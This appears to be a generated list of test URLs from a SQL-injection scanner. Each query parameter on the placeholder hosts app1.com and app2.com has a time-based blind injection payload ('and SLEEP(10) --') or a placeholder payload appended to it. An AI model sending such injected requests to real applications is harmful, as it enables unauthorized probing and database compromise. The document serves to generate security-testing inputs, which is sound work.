http:/app2.com/url2.php?query-string+and+SLEEP%2810%29+--+
http:/app2.com/url2.php?query-string+payload2+--+
http:/app2.com/url2.php?query-string+payload3+--+
http:/app1.com/url1.php?query-string+and+SLEEP%2810%29+--+
http:/app1.com/url1.php?query-string+payload2+--+
http:/app1.com/url1.php?query-string+payload3+--+
http:/app1.com/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http:/app1.com/admin/group.php?&op=edit+and+SLEEP%2810%29+--+
&use_js=1&group_id=1
http:/app1.com/admin/group.php?&op=edit&use_js=1+and+SLEEP%2810%29+--+
&group_id=1
http:/app1.com/admin/group.php?op=edit&use_js=1&group_id=1+payload2+--+
http:/app1.com/admin/group.php?&op=edit+payload2+--+
&use_js=1&group_id=1
http:/app1.com/admin/group.php?&op=edit&use_js=1+payload2+--+
&group_id=1
http:/app1.com/admin/group.php?op=edit&use_js=1&group_id=1+payload3+--+
http:/app1.com/admin/group.php?&op=edit+payload3+--+&use_js=1&group_id=1
http:/app1.com/admin/group.php?&op=edit&use_js=1+payload3+--+&group_id=1
